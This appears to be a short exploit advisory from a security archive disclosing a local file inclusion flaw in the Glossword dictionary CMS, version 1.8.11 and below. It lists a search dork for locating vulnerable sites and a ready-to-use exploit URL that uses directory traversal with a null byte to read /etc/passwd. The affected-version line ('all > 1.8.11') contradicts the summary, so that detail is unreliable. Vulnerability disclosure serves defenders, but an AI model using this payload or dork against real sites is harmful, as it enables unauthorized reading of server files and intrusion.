Glossword versions 1.8.11 and below suffer from a local file inclusion vulnerability in index.php.
273810e74f9701aa30e1e70039f2f7af6379da4b285dca3890d3bf3bfde294e6|-->Glossword 1.8.11 LFI
|-->CMS INFORMATION:
|
|-->WEB: http://code.google.com/p/glossword/
|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list
|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.
|
| CMS VULNERABILITY:
|
|-->TESTED ON: firefox 3
|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...
|-->CATEGORY: LOCAL FILE INCLUSION (LFI)
|-->AFFECT VERSION: all > 1.8.11
|-->Author: t0fx
|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais
|-->Exploit :
| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed